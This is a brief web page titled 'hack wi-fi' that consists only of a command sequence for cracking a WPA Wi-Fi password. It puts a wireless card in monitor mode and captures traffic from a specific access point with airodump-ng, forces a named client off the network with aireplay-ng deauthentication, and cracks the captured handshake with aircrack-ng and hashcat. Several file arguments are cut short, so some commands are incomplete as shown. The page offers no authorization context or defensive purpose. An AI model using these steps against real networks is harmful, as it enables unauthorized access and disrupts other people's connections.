hack wi-fi

cracker wifi with hashcat sudo su ifconfig [iwconfig] airodump-ng wlx1cbfce1d43bb airodump-ng —bssid c0:a5:dd:08:5a:c8 —channel 2 -w /home/tomas037/oleg wlx000f008c421c aireplay-ng —deauth 57 -a c0:a5:dd:08:5a:c8 -c a8:9c:ed:7d:f1:bb wlx000f008c421c wpaclean /home/tomas037/clean_hand /home/tomas037/ aircrack-ng -w /home/tomas037/ -b c0:a5:dd:08:5a:c8 /home/tomas037/ hashcat -m 2500 -w 3 /home/tomas037/ /home/tomas037/
Back to Top